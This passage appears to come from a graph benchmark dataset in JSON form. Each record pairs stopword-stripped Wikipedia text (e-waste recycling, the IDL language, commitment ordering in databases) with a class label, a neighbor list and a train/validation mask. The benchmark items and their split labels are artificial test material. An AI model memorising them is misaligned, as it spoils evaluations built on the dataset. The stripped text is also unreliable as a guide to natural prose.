recycling plant combines dismantling component recovery increased cost-effective processing bulk electronic waste reuse alternative option recycling extends lifespan device devices still need eventual recycling allowing others purchase used electronics recycling postponed value gained device use recycling raw materials end-of-life electronics effective solution growing e-waste problem electronic devices contain variety materials including metals recovered future uses dismantling providing reuse possibilities intact natural resources conserved air water pollution caused hazardous disposal avoided additionally recycling reduces amount greenhouse gas emissions caused manufacturing new products another benefit recycling e-waste many materials recycled re-used materials recycled include ferrous iron-based non-ferrous metals glass various types plastic “ non-ferrous metals mainly aluminum copper re-smelted re-manufactured ferrous metals steel iron also re-used due recent surge popularity 3d printing certain 3d printers designed fdm variety produce waste easily recycled decreases amount harmful pollutants atmosphere excess plastic printers comes byproduct also reused create new 3d printed creations benefits recycling extended responsible recycling methods used u.s. responsible recycling aims minimize dangers human health environment disposed dismantled electronics create responsible recycling ensures best management practices electronics recycled worker health safety consideration environment locally abroad europe metals recycled returned companies origin reduced cost committed recycling system manufacturers japan pushed make products sustainable since many companies responsible recycling products imposed responsibility manufacturers requiring many redesign infrastructure result manufacturers japan added option sell recycled metals one factors exacerbate e-waste problem diminishing lifetime many electrical electronic goods two drivers particular trend one hand consumer demand low cost products mitigates product quality results short product lifetimes manufacturers sectors encourage regular upgrade cycle may even enforce though restricted availability spare parts service manuals software updates planned obsolescence consumer dissatisfaction state affairs led growing repair movement often community level repair cafės restart parties promoted restart project right repair spearheaded us farmers dissatisfied non-availability service information specialised tools spare parts high-tech farm machinery movement extends far beyond farm machinery example restricted repair options offered apple coming criticism manufacturers often counter safety concerns resulting unauthorised repairs modifications computer components reused assembling new computer products others reduced metals reused applications varied construction flatware jewellery substances found large quantities include epoxy resins fiberglass pcbs pvc polyvinyl chlorides thermosetting plastics lead tin copper silicon beryllium carbon iron aluminium elements found small amounts include cadmium mercury thallium elements found trace amounts include americium antimony arsenic barium bismuth boron cobalt europium gallium germanium gold indium lithium manganese nickel niobium palladium platinum rhodium ruthenium selenium silver tantalum terbium thorium titanium vanadium yttrium almost electronics contain lead tin solder copper wire printed circuit board tracks though use lead-free solder spreading rapidly following ordinary applications residents living around e-waste recycling sites even involve e-waste recycling activities also face environmental exposure due food water environmental contamination caused e-waste easily contact e-waste contaminated air water soil dust food sources general three main exposure pathways inhalation ingestion dermal contact studies show people living around e-waste recycling sites higher daily intake heavy metals serious body burden potential health risks include mental health impaired cognitive function general physical health damage see also electronic waste hazardous dna damage also found prevalent e-waste exposed populations i.e adults children neonates populations control area dna breaks increase likelihood wrong replication thus mutation well lead cancer damage tumor suppressor gene prenatal exposure e-waste found adverse effects human body burden pollutants neonates guiyu one famous e-waste recycling sites china found increased cord blood lead concentration neonates associated parents participation e-waste recycling processes well long mothers spent living guiyu e-waste recycling factories workshops pregnancy besides higher placental metallothionein small protein marking exposure toxic metals found among neonates guiyu result cd exposure higher cd level guiyu neonates related involvement e-waste recycling parents high pfoa exposure mothers guiyu related adverse effect growth new-born prepotency area prenatal exposure informal e-waste recycling also lead several adverse birth outcomes still birth low birth weight low apgar scores etc longterm effects behavioral learning problems neonates future life children especially sensitive e-waste exposure several reasons smaller size higher metabolism rate larger surface area relation weight multiple exposure pathways example dermal hand-to-mouth take-home exposure measured 8-time potential health risk compared adult e-waste recycling workers studies found significant higher blood lead levels bll blood cadmium levels bcl children living e-waste recycling area compared living control area example one study found average bll guiyu nearly 1.5 times compared control site 15.3 ug/dl compared 9.9 ug/dl cdc united states set reference level blood lead 5 ug/dl highest concentrations lead found children parents whose workshop dealt circuit boards lowest among recycled plastic exposure e-waste cause serious health problems children children exposure developmental neurotoxins containing e-waste lead mercury cadmium chromium pbdes lead higher risk lower iq impaired cognitive function adverse effects certain age groups decreased lung function children e-waste recycling sites found studies also found associations children e-waste exposure impaired coagulation hearing loss decreased vaccine antibody tilters e-waste recycling area occupational safety health administration osha summarized several potential safety hazards recycling workers general crushing hazards hazardous energy released toxic metals osha also specified chemical components electronics potentially harm e-recycling workers health lead mercury pcbs asbestos refractory ceramic fibers rcfs radioactive substances.besides united states chemical hazards specific occupational exposure limits oels set osha national institute occupational safety health niosh american conference governmental industrial hygienists acgih details health consequences chemical hazards see also electronic waste electronic waste substances informal e-recycling industry refers small e-waste recycling workshops automatic procedures personal protective equipment ppe hand formal e-recycling industry refers regular e-recycling facilities sorting materials e-waste automatic machinery manual labor pollution control ppe common sometimes formal e-recycling facilities dismantle e-waste sort materials distribute downstream recycling department recover materials plastic metals health impact e-waste recycling workers working informal industry formal industry expect different extent studies three recycling sites china suggest health risks workers formal e-recycling facilities jiangsu shanghai lower compared worked informal e-recycling sites guiyu another study e-waste recycling india hair samples collected workers e-waste recycling facility e-waste recycling slum community informal industry bangalore levels v cr mn mo sn tl pb significantly higher workers e-waste recycling facility compared e-waste workers slum community however co ag cd hg levels significantly higher slum community workers compared facility workers even formal e-recycling industry workers exposed excessive pollutants studies formal e-recycling facilities france sweden found workers overexposure compared recommended occupational guidelines lead cadmium mercury metals well bfrs pcbs dioxin furans workers formal industry also exposed brominated flame-retardants reference groups occupational health safety e-waste recycling workers employers workers take actions suggestions e-waste facility employers workers given california department public health illustrated graphic policy conventions security general",
    "neighbors": [
      6658,
      8836,
      5637,
      6,
      9356,
      11534,
      403,
      7704,
      10393,
      7579,
      9499,
      6301,
      1056,
      10023,
      3626,
      2867,
      1083,
      3009,
      7492,
      1477,
      2383,
      3279,
      3666,
      2259,
      2773,
      3162,
      1500,
      6494,
      484,
      8678,
      232,
      11368,
      6763,
      1776,
      5875,
      1524,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 7580,
    "label": 9,
    "text": "IDL_(programming_language):idl programming language idl short interactive data language programming language used data analysis popular particular areas science astronomy atmospheric physics medical imaging idl shares common syntax pv-wave originated codebase though languages subsequently diverged detail also two free implementations gnu data language gdl fawlty language fl idl vectorized numerical interactive commonly used interactive processing large amounts data including image processing syntax includes many constructs fortran c. idl originated early vax/vms/fortran syntax still shows heritage findgen function example returns one-dimensional array floating point numbers values equal series integers starting 0 note operation second line applies vectorized manner whole 100-element array created first line analogous way general-purpose array programming languages apl j k would example contains divide zero idl report arithmetic overflow store nan value corresponding element array first one array elements finite nan excluded visualization generated plot command array programming languages idl fast vector operations sometimes fast well-coded custom loop fortran c quite slow elements need processing individually hence part art using idl array programming language matter numerically heavy computations make use built-in vector operations predecessor versions idl developed 1970s laboratory atmospheric space physics lasp university colorado boulder lasp david stern involved efforts allow scientists test hypotheses without employing programmers write modify individual applications first program evolutionary chain idl stern developed named rufus simple vector-oriented calculator ran pdp-12 accepted two-letter codes specified arithmetic operation input registers serve operands destination register version rufus developed pdp-8 mars mariner spectrum editor mmed mmed used lasp scientists interpret data mariner 7 mariner 9 later stern wrote program named sol also ran pdp-8 unlike predecessors true programming language fortran-like syntax sol array-oriented language primitive graphics capabilities stern left lasp found research systems inc. rsi 1977 first rsi product idl pdp-11 release graphics supported idl primarily tektronix terminals raster graphics displays rsi sold first idl licenses nasa goddard space flight center ball aerospace technologies corp. 1979 two years later rsi released initial vax/vms version idl written vax-11 macro fortran took advantage vax virtual memory 32-bit address space national center atmospheric research ncar university michigan university colorado naval research laboratory started use idl version 1987 rsi shifted development work idl unix environment required complete re-write code c rather port existing version vax idl stern ali bahrami rewrote idl unix sun 3 taking advantage re-write extend improve language subsequently idl expanded ported several variants unix vms linux microsoft windows 1992 mac os 1994 widgets added idl 1992 providing event-driven programming graphical user interfaces 1997 ion idl net web server-based system commercially released first version envi application remote sensing multispectral hyperspectral image analysis written idl released 1994 envi created developed owned better solutions consulting llc purchased bsc october 2000 eastman kodak coincident purchase rsi rsi sold marketed supported envi terms license agreement bsc llc 1994 october 2000 new object pointer types limited object-oriented programming capabilities added idl 1997 idl applied widely space science example solar physics european space agency used idl process almost pictures halley comet taken giotto spacecraft team repairing hubble space telescope used idl help diagnose anomalies main mirror 1995 astronauts board space shuttle used idl loaded laptop study ultraviolet radiation currently amongst applications idl used analysis secchi part stereo mission nrl usa rutherford appleton laboratory uk rsi became wholly owned subsidiary itt industries march 2004 15 may 2006 rsi began business itt visual information solutions effective 31 october 2011 result restructuring company became exelis visual information solutions idl owned maintained harris geospatial solutions computer language idl features make idl simple use interactively also cause difficulties building large programs single namespace particularly problematic example language updates include new built-in functions occasion invalidated large scientific libraries arrays passed reference mechanism advertised feature language pass data back subroutine – contrast array slices copied passed data modifications flow back array ranges subroutine exits violating principle least surprise many historical irregularities survive early heritage language requiring individual workarounds programmer example preceding issue alleviated using compiler option also provision idl eula effect australia result sections 47d 47h country copyright act following graphics created idl source code included",
    "neighbors": [
      9345,
      7684,
      7301,
      8582,
      5129,
      7945,
      3980,
      2317,
      6797,
      15,
      7950,
      8079,
      9490,
      5395,
      9871,
      2457,
      5148,
      8732,
      7326,
      8611,
      7341,
      9133,
      6962,
      10043,
      6718,
      2242,
      10946,
      5830,
      5703,
      4808,
      5833,
      4042,
      5450,
      8262,
      8013,
      2000,
      5588,
      2652,
      10848,
      10465,
      11239,
      4840,
      11625,
      8554,
      5612,
      5741,
      7148,
      5492,
      7924,
      3960,
      11385,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7581,
    "label": 1,
    "text": "Commitment_ordering:commitment ordering commitment ordering co class interoperable serializability techniques concurrency control databases transaction processing related applications allows optimistic non-blocking implementations proliferation multi-core processors co also increasingly utilized concurrent programming transactional memory especially software transactional memory stm achieving serializability optimistically co also name resulting transaction schedule history property originally defined 1988 name dynamic atomicity co compliant schedule chronological order commitment events transactions compatible precedence order respective transactions co broad special case conflict serializability effective means reliable high-performance distributed scalable achieve global serializability modular serializability across collection database systems possibly use different concurrency control mechanisms co also makes system serializability compliant already not-co-compliant database system augmented co component commitment order coordinator—coco orders commitment events co compliance neither data-access transaction operation interference co provides low overhead general solution global serializability distributed serializability instrumental global concurrency control distributed concurrency control multi database systems transactional objects possibly highly distributed e.g. within cloud computing grid computing networks smartphones atomic commitment protocol acp type fundamental part solution utilized break global cycles conflict precedence serializability graph co general property necessary condition guarantees global serializability database systems involved share concurrency control information beyond atomic commitment protocol unmodified messages knowledge whether transactions global local database systems autonomous thus co variants general technique require typically costly distribution local concurrency control information e.g. local precedence relations locks timestamps tickets generalizes popular strong strict two-phase locking ss2pl property conjunction two-phase commit protocol 2pc de facto standard achieve global serializability across ss2pl based database systems result co compliant database systems different concurrency control types transparently join ss2pl based solutions global serializability addition locking based global deadlocks resolved automatically co based multi-database environment important side-benefit including special case completely ss2pl based environment previously unnoticed fact ss2pl furthermore strict commitment ordering sco raz 1991c intersection strictness co provides better performance shorter average transaction completion time resulting better transaction throughput ss2pl whenever read-write conflicts present identical blocking behavior write-read write-write conflicts comparable locking overhead advantage sco especially significant lock contention strictness allows ss2pl sco use effective database recovery mechanisms two major generalizing variants co exist extended co eco raz 1993a multi-version co mvco raz 1993b well provide global serializability without local concurrency control information distribution combined relevant concurrency control allow optimistic non-blocking implementations use additional information relaxing co constraints achieving better concurrency performance vote ordering vo generalized co gco raz 2009 container schedule set property technique co variants local vo necessary condition guaranteeing global serializability atomic commitment protocol acp participants share concurrency control information generalized autonomy property co variants inter-operate transparently guaranteeing global serializability automatic global deadlock resolution also together mixed heterogeneous environment different variants commitment ordering co raz 1990 1992 1994 2009 schedule property referred also dynamic atomicity since 1988 commit ordering commit order serializability strong recoverability since 1991 latter misleading name since co incomparable recoverability term strong implies special case means schedule strong recoverability property necessarily co property vice versa 2009 co characterized major concurrency control method together previously known since 1980s three major methods locking time-stamp ordering serialization graph testing enabler interoperability systems using different concurrency control mechanisms federated database system loosely defined multidatabase system typically distributed communication network transactions span multiple possibly distributed databases enforcing global serializability system problematic even every local schedule single database serializable still global schedule whole system necessarily serializable massive communication exchanges conflict information needed databases reach conflict serializability would lead unacceptable performance primarily due computer communication latency problem achieving global serializability effectively characterized open public disclosure co 1991 inventor yoav raz raz 1991a see also global serializability enforcing co effective way enforce conflict serializability globally distributed system since enforcing co locally database transactional object also enforces globally database may use possibly different type concurrency control mechanism local mechanism already provides conflict serializability enforcing co locally cause additional aborts since enforcing co locally affect data access scheduling strategy mechanism scheduling determines serializability related aborts mechanism typically consider commitment events order co solution requires communication overhead since uses unmodified atomic commitment protocol messages already needed distributed transaction reach atomicity atomic commitment protocol plays central role distributed co algorithm enforces co globally breaking global cycles cycles span two databases global conflict graph co special cases generalizations interoperable achieve global serializability transparently utilized together single heterogeneous distributed environment comprising objects possibly different concurrency control mechanisms commitment ordering including special cases together generalizations see co variants provides general high performance fully distributed solution central processing component central data structure needed guaranteeing global serializability heterogeneous environments multidatabase systems multiple transactional objects objects states accessed modified transactions e.g. framework transactional processes within cloud computing grid computing co solution scales network size number databases without negative impact performance assuming statistics single distributed transaction e.g. average number databases involved single transaction unchanged proliferation multi-core processors optimistic co oco also increasingly utilized achieve serializability software transactional memory numerous stm articles patents utilizing commit order already published e.g. zhang et al 2006 commitment ordering co special case conflict serializability co enforced non-blocking mechanisms transaction complete task without data-access blocked allows optimistic concurrency control however commitment could blocked co schedule commitment events partial precedence order transactions corresponds precedence partial order respective transactions directed conflict graph precedence graph serializability graph induced conflicting access operations usually read write insert/modify/delete operations co also applies higher level operations conflicting noncommutative well conflicts operations upon multi-version data commitment decision events generated either local commitment mechanism atomic commitment protocol different processes need reach consensus whether commit abort protocol may distributed centralized transactions may committed concurrently commit partial order allows conflicting operations different conflicting operations induce different partial orders transactions conflict graph cycles schedule violate serializability transactions cycle committed case partial order commitment events found thus cycles conflict graph need broken aborting transactions however conflict serializable schedule made co without aborting transaction properly delaying commit events comply transactions precedence partial order co enforcement sufficient concurrency control mechanism since co lacks recoverability property supported well fully distributed global commitment ordering enforcement algorithm exists uses local co participating database needs unmodified atomic commitment protocol messages communication distributed algorithm combination local database co algorithm processes atomic commitment protocol fully distributed atomic commitment protocol essential enforce atomicity distributed transaction decide whether commit abort procedure always carried distributed transactions independently concurrency control co common example atomic commitment protocol two-phase commit protocol resilient many types system failure reliable environment processes usually fail together e.g. integrated circuit simpler protocol atomic commitment may used e.g. simple handshake distributed transaction participating processes arbitrary known special participant transaction coordinator i.e. type one-phase commit protocol atomic commitment protocol reaches consensus among participants whether commit abort distributed global transaction spans participants essential stage protocol yes vote either explicit implicit participant means obligation voting participant obey decision protocol either commit abort otherwise participant unilaterally abort transaction explicit vote protocol commits transaction yes votes received participants thus missing vote typically considered otherwise protocol aborts transaction various atomic commit protocols differ abilities handle different computing environment failure situations amounts work computing resources needed different situations entire co solution global serializability based fact case missing vote distributed transaction atomic commitment protocol eventually aborts transaction database system local co algorithm determines needed commitment order database characterization co order depends local precedence order transactions results local data access scheduling mechanisms accordingly yes votes atomic commitment protocol scheduled unaborted distributed transaction follows vote means yes vote precedence relation conflict exists two transactions second voted first completed either committed aborted prevent possible commit order violation atomic commitment protocol happen since commit order protocol necessarily voting order precedence relation exists voted concurrently vote ordering strategy ensures also atomic commitment protocol maintains commitment order necessary condition guaranteeing global co local co database without global co local co property meaning database co compliant may violated however since database systems schedule transactions independently possible transactions precedence orders two databases compatible global partial order exists embed respective local partial orders together co precedence orders also commitment orders participating databases distributed transaction compatible local precedence orders transaction without knowing typically coordination database systems exists conflicts since needed communication massive unacceptably degrades performance means transaction resides global cycle involving two databases global conflict graph case atomic commitment protocol fail collect votes needed commit transaction vote ordering strategy least one database delay vote transaction indefinitely comply commitment precedence order since waiting completion another preceding transaction global cycle delayed indefinitely another database different order means voting-deadlock situation involving databases cycle result protocol eventually abort deadlocked transaction global cycle since transaction missing least one participant vote selection specific transaction cycle aborted depends atomic commitment protocol abort policies timeout mechanism common may result one needed abort per cycle preventing unnecessary aborts abort time shortening achieved dedicated abort mechanism co abort break global cycle involving distributed transaction deadlocked transactions possibly conflict deadlocked thus blocked free voted worthwhile noting database involved voting-deadlock continues vote regularly transactions conflict deadlocked transaction typically almost outstanding transactions thus case incompatible local partial commitment orders action needed since atomic commitment protocol resolves automatically aborting transaction cause incompatibility means vote ordering strategy also sufficient condition guaranteeing global co following concluded global co implies global serializability global co algorithm comprises enforcing local co participating database system ordering commits local transactions see enforcing co locally enforcing vote ordering strategy theorem global transactions global cycle elimination process voting deadlock explained detail following observation first assumed simplicity every transaction reaches ready-to-commit state voted least one database implies blocking locks occurs define wait vote commit graph directed graph transactions nodes directed edge first transaction second transaction first transaction blocks vote commit second transaction opposite conventional edge direction wait-for graph blocking happens second transaction conflict first transaction see thus wait vote commit graph identical global conflict graph cycle wait vote commit graph means deadlock voting hence deadlock voting cycle conflict graph local cycles confined single database eliminated local serializability mechanisms consequently global cycles left eliminated atomic commitment protocol aborts deadlocked transactions missing blocked respective votes secondly also local commits dealt note enforcing co also waiting regular local commit local transaction block local commits votes transactions upon conflicts situation global transactions change also without simplifying assumption final result also local commitment local transactions without voting atomic commitment finally blocking lock excluded far needs considered lock blocks conflicting operation prevents conflict materialized lock released transaction end may block indirectly either vote local commit another transaction get ready state effect direct blocking vote local commit case cycle generated conflict graph blocking lock also represented edge added edges representing events blocking-by-a-lock conflict graph becoming augmented conflict graph presence co augmented conflict graph fact reversed edge local-commit voting wait-for graph edge exists first transaction either local global second second waiting first end order either voted global locally committed local global cycles across two databases graph generate voting-deadlocks graph global cycles provide complete characterization voting deadlocks may include combination materialized non-materialized conflicts cycles materialized conflicts also cycles regular conflict graph affect serializability one lock related non-materialized conflicts cycle prevent cycle regular conflict graph make locking related deadlock global cycles voting-deadlocks need broken resolved maintain global serializability resolve global deadlocks involving data access locking indeed broken atomic commitment protocol due missing votes upon voting deadlock comment observation also explains correctness extended co eco global transactions voting order must follow conflict graph order vote blocking order relation graph path exists two global transactions local transactions voted local commits blocked upon conflicts results voting-deadlock situations resulting global cycle elimination process eco voting-deadlock situation summarized follows also following locking based special case concluded voting-deadlocks key operation distributed co global cycle elimination voting-deadlock resolution atomic commitment resulting aborted transactions re-executions time consuming regardless concurrency control used databases schedule transactions independently global cycles unavoidable complete analogy cycles/deadlocks generated local ss2pl distribution transaction operation scheduling coordination results autonomy violation typically also substantial performance penalty however many cases likelihood made low implementing database transaction design guidelines reduce number conflicts involving global transaction primarily properly handling hot spots database objects frequent access avoiding conflicts using commutativity possible e.g. extensively using counters finances especially multi-transaction accumulation counters typically hot spots atomic commitment protocols intended designed achieve atomicity without considering database concurrency control abort upon detecting heuristically finding e.g. timeout sometimes mistakenly unnecessarily missing votes typically unaware global cycles protocols specially enhanced co including co variants prevent unnecessary aborts accelerate aborts used breaking global cycles global augmented conflict graph better performance earlier release upon transaction-end computing resources typically locked data example existing locking based global deadlock detection methods timeout generalized consider also local commit vote direct blocking besides data access blocking possible compromise mechanisms effectively detecting breaking frequent relatively simple handle length-2 global cycles using timeout undetected much less frequent longer cycles commitment ordering enforced locally single database dedicated co algorithm algorithm/protocol provides special case co. important protocol utilized extensively database systems generates co schedule strong strict two phase locking protocol ss2pl release transaction locks transaction either committed aborted see ss2pl proper subset intersection 2pl strictness generic local co algorithm raz 1992 algorithm 4.1 algorithm independent implementation details enforces exactly co property block data access nonblocking consists aborting certain set transactions needed upon committing transaction aborts uniquely determined given time minimal set undecided neither committed aborted transactions run locally cause serializability violation future later generate cycles committed transactions conflict graph abort set committed transaction committing transaction abort commit time committed doomed aborted set consists undecided transactions directed edges conflict graph committed transaction size set increase transaction waiting committed ready state processing ended typically decreases time transactions decided thus unless real-time constraints exist complete transaction preferred wait committing transaction let set decrease size another serializability mechanism exists locally eliminates cycles local conflict graph cycle involving transaction exists set empty eventually abort set member needed otherwise set stabilize transactions local cycles aborting set members occur break cycles since case co conflicts generate blocking commit local cycles augments conflict graph see indicate local commit-deadlocks deadlock resolution techniques ss2pl used e.g. like timeout wait-for graph local cycle augmented conflict graph least one non-materialized conflict reflects locking-based deadlock local algorithm applied local augmented conflict graph rather regular local conflict graph comprises generic enhanced local co algorithm single local cycle elimination mechanism guaranteeing local serializability handling locking based local deadlocks practically additional concurrency control mechanism always utilized even solely enforce recoverability generic co algorithm affect local data access scheduling strategy runs alongside local concurrency control mechanism affects commit order reason need abort transactions needed aborted serializability violation prevention combined local concurrency control mechanism net effect co may delay commit events voting distributed environment comply needed commit order delay special cases example ss2pl average significantly less following theorem concluded proliferation multi-core processors variants generic local co algorithm also increasingly utilized concurrent programming transactional memory especially software transactional memory achieving serializability optimistically commit order e.g. ramadan et al 2009 zhang et al 2006 von parun et al 2007 numerous related articles patents utilizing co already published database system multidatabase environment assumed software architecture point view co component implements generic co algorithm locally commitment order coordinator coco designed straightforward way mediator single database system atomic commitment protocol component raz 1991b however coco typically integral part database system coco functions vote commit ready global transactions processing ended according local commitment order vote abort transactions database system initiated abort database system initiate abort transaction many reasons pass atomic commitment decision database system local transactions identified voting needed determining commitment order coco maintains updated representation local conflict graph local augmented conflict graph capturing also locking deadlocks undecided neither committed aborted transactions data structure e.g. utilizing mechanisms similar locking capturing conflicts data-access blocking coco component interface database system receive conflict ready processing ended readiness vote global transaction commit local one abort notifications database system also interfaces atomic commitment protocol vote receive atomic commitment protocol decision global transaction decisions delivered coco database system interface well local transactions commit notifications proper commit order coco including interfaces enhanced implements another variant co see plays role database concurrency control mechanism beyond voting atomic commitment coco also guarantees co locally single isolated database system interface atomic commitment protocol databases participate distributed transactions i.e. transactions span single database use shared concurrency control information use unmodified atomic commitment protocol messages reaching atomicity maintaining local commitment ordering one generalizing variants see necessary condition guaranteeing global serializability proof technique found raz 1992 different proof method raz 1993a also sufficient condition mathematical fact derived definitions serializability transaction means complying co global serializability guaranteed condition condition local concurrency control information sharing databases beyond atomic commit protocol messages atomic commitment minimal requirement distributed transaction since always needed implied definition transaction raz 1992 defines database autonomy independence complying requirement without using additional local knowledge using definition following concluded however definition autonomy implies example transactions scheduled way local transactions confined single database identified autonomous database system realistic transactional objects restrictive less realistic general purpose database systems autonomy augmented ability identify local transactions compliance general property extended commitment ordering eco see makes eco necessary condition raz 2009 notion generalized autonomy captures intended notion autonomy definition probably broadest definition possible context database concurrency control makes co together useful concurrency control information distribution generalizing variants vote ordering vo see co variants necessary condition global serializability i.e. union co generalizing variants necessary set vo may include also new unknown useful generalizing variants commitment ordering co solution technique global serializability summarized follows database transactional object multidatabase environment complies co i.e. arranges local transactions commitments votes global distributed transactions atomic commitment protocol according local database partial order induced local conflict graph serializability graph respective transactions global co global serializability guaranteed database co compliance achieved effectively local conflict serializability based concurrency control mechanism neither affecting transaction execution process scheduling aborting also database autonomy violated low overhead incurred detecting conflicts e.g. locking data-access blocking already detected purposes ordering votes local transactions commits according conflicts case incompatible partial orders two databases global partial order embed respective local partial orders together global cycle spans two databases global conflict graph generated together co results cycle blocked votes voting-deadlock occurs databases cycle however allowed concurrent voting database typically almost outstanding votes continue execute case atomic commitment protocol fails collect votes needed blocked transactions global cycle consequently protocol aborts transaction missing vote breaks global cycle voting-deadlock resolved related blocked votes free executed breaking global cycle global conflict graph ensures global co global serializability maintained thus case incompatible local partial commitment orders action needed since atomic commitment protocol resolves automatically aborting transaction cause incompatibility furthermore also global deadlocks due locking global cycles augmented conflict graph least one data access blocking result voting deadlocks resolved automatically mechanism local co necessary condition guaranteeing global serializability databases involved share concurrency control information beyond unmodified atomic commitment protocol messages i.e. databases autonomous context concurrency control means every global serializability solution autonomous databases must comply co otherwise global serializability may violated thus likely violated quickly high-performance environment co solution scales network size number databases without performance penalty utilizes common distributed atomic commitment architecture distinguishing characteristic co solution distributed serializability techniques fact requires conflict information distributed e.g. local precedence relations locks timestamps tickets makes uniquely effective utilizes unmodified atomic commitment protocol messages already used instead common way achieve distributed serializability distributed system distributed lock manager dlm dlms communicate lock non-materialized conflict information distributed environment typically suffer computer communication latency reduces performance system co allows achieve distributed serializability general conditions without distributed lock manager exhibiting benefits already explored multidatabase environments particular reliability high performance scalability possibility using optimistic concurrency control desired conflict information related communications network incurred overhead delays automatic distributed deadlock resolution distributed transactional systems rely atomic commitment protocol coordinate atomicity whether commit abort among processes distributed transaction also typically recoverable data i.e. data transactions control e.g. database data confused recoverability property schedule directly accessed single transactional data manager component also referred resource manager handles local sub-transactions distributed transaction portion single location e.g. network node even data accessed indirectly entities distributed system transaction i.e. indirect access requires direct access local sub-transaction thus recoverable data distributed transactional system typically partitioned among transactional data managers system transactional data managers typically comprise participants system atomic commitment protocol participant complies co e.g. using ss2pl cocos combination see entire distributed system provides co theorems participant considered separate transactional object thus distributed serializability furthermore co utilized together atomic commitment protocol also distributed deadlocks i.e. deadlocks span two data managers caused data-access locking resolved automatically thus following corollary concluded theorem also means ss2pl co variant used locally transactional data manager data manager exclusive control data distributed lock manager often utilized enforce distributed ss2pl needed distributed ss2pl serializability relevant wide range distributed transactional applications easily designed meet theorem conditions implementing distributed optimistic co doco generic local co algorithm utilized atomic commitment protocol participants system data access blocking thus local deadlocks previous theorem following corollary distributed database system utilizes ss2pl resides two remote nodes b database system two transactional data managers resource managers one node database data partitioned two data managers way exclusive control local node portion data handles data locks without knowledge manager distributed transaction data managers need execute available atomic commitment protocol two distributed transactions formula_3 formula_2 running concurrently access data x y. x exclusive control data manager b manager access x b respective local sub-transactions b portions formula_3 formula_2 nodes following database system schedule certain point time following formula_3 holds read-lock x formula_2 holds read-locks thus formula_27 formula_30 blocked lock compatibility rules ss2pl executed distributed deadlock situation also voting-deadlock see distributed global cycle length 2 number edges conflicts 2 frequent length local sub-transactions following states since atomic commitment protocol receive votes blocked sub-transactions voting-deadlock eventually abort transaction missing vote timeout either formula_3 formula_2 timeouts fall close resolve global deadlock remaining transaction complete running voted committed aborted transaction immediately restarted re-executed scenario conflicts non-materialized global voting-deadlock reflected cycle global wait-for graph global conflict graph see exact characterization voting-deadlocks global cycles however database system utilize co variant exactly conflicts voting-deadlock situation resolution conflicts either materialized non-materialized depending co variant used example sco used distributed database system instead ss2pl two conflicts example materialized local sub-transactions ready states vote blocking occurs two transactions one node co voting rule applied independently b due conflicts formula_52 voted formula_53 ends formula_54 voted formula_55 ends voting-deadlock conflict graph global cycle conflicts materialized resolved atomic commitment protocol distributed serializability maintained unlikely distributed database system possible principle occurs multi-database employ ss2pl b employs sco case global cycle neither wait-for graph serializability graph still augmented conflict graph union two various combinations summarized following table comment examples describe real recommended utilization co example hypothetical demonstration certain experimental distributed memory-resident databases advocate multi single-threaded core music transactional environments single-threaded refers transaction threads serial execution transactions purpose possible orders magnitude gain performance e.g. h-store voltdb relatively conventional transaction execution multiple threads core described music independent way cores distributed may reside one integrated circuit chip many chips possibly distributed geographically many computers environment recoverable transactional data partitioned among threads cores implemented conventional way distributed co described previous sections doco strictness exist automatically however downsides exist straightforward implementation environment practicality general-purpose solution questionable hand tremendous performance gain achieved applications bypass downsides situations comment music straightforward implementation described uses example usual distributed co voting transaction thread blocking atomic commitment protocol needed demonstration connection implementation h-store project music environment local schedules serial thus local optimistic co oco see global co enforcement vote ordering strategy condition atomic commitment protocol met automatically results distributed co compliance thus distributed serializability automatic global voting deadlock resolution furthermore also local strictness follows automatically serial schedule theorem 5.2 raz 1992 page 307 co vote ordering strategy applied also global strictness guaranteed note serial locally mode allows strictness optimistic data access blocking together following concluded special case schedule property classes e.g. ss2pl sco strictly contained co class generalizing classes eco mvco strictly contain co class i.e. include also schedules co compliant generalizing variants also guarantee global serializability without distributing local concurrency control information database generalized autonomy property uses local information relaxing co constraints utilizing additional local information better concurrency performance eco uses knowledge transactions local i.e. confined single database mvco uses availability data versions values like co generalizing variants non-blocking interfere transaction operation scheduling seamlessly combined relevant concurrency control mechanism term co variant refers general co eco mvco combination relevant concurrency control mechanism property including multi-version based eco mveco generalizing variants guarantee global serializability local concurrency control information distribution known may discovered strong strict two phase locking ss2pl also referred rigorousness rigorous scheduling means read write locks transaction released transaction ended either committed aborted set ss2pl schedules proper subset set co schedules property widely utilized database systems since implies co databases use participate global transactions generate together serializable global schedule using atomic commitment protocol needed atomicity multi-database environment database modification addition needed case participate co distributed solution set undecided transactions aborted committing local generic co algorithm empty locks hence algorithm unnecessary case transaction voted database system immediately entering ready state i.e. completing running task locally locks released database system decided atomic commitment protocol thus condition global co enforcing theorem kept automatically local timeout mechanism used database system resolve local ss2pl deadlocks aborting blocked transactions breaks potential local cycles global conflict graph real cycles augmented conflict graph also database system potential global cycles side effect atomic commitment protocol abort mechanism relatively slow independent aborts several entities typically may result unnecessary aborts one transaction per global cycle situation different local wait-for graph based mechanisms identify global cycles atomic commitment protocol break global cycle resulting voting deadlock resolved earlier another database local ss2pl together atomic commitment implying global serializability also deduced directly transactions including distributed obey 2pl ss2pl rules atomic commitment protocol mechanism needed consensus commit rather end phase-two synchronization point probably reason without considering atomic commitment voting mechanism automatic global deadlock resolution noticed co strict commitment ordering sco raz 1991c intersection strictness special case recoverability co provides upper bound schedule concurrency properties exist implemented using blocking mechanisms locking similar used popular ss2pl similar overheads unlike ss2pl sco block read-write conflict possibly blocks commit instead sco ss2pl identical blocking behavior two conflict types write-read write-write result sco shorter average blocking periods concurrency e.g. performance simulations single database significant variant locks ordered sharing identical sco clearly show approximately 100 gain transaction loads also identical transaction loads sco reach higher transaction rates ss2pl lock thrashing occurs concurrency means given computing resources transactions completed time unit higher transaction rate throughput average duration transaction shorter faster completion see chart advantage sco especially significant lock contention sco practical ss2pl since ss2pl provides besides serializability also strictness widely utilized basis efficient recovery databases failure ss2pl mechanism converted sco one better performance straightforward way without changing recovery methods description sco implementation found perrizo tatarinov 1998 see also semi-optimistic database scheduler ss2pl proper subset sco another explanation sco less constraining provides concurrency ss2pl implementing optimistic commitment ordering oco generic local co algorithm utilized without data access blocking thus without local deadlocks oco without transaction operation scheduling constraints covers entire co class special case co class rather useful co variant mechanism characterization extended commitment ordering eco raz 1993a generalizes co local transactions transactions confined single database distinguished global distributed transactions transactions span two databases commitment order applied global transactions thus local database schedule eco property chronological partial order commit events global transactions unimportant local transactions consistent order 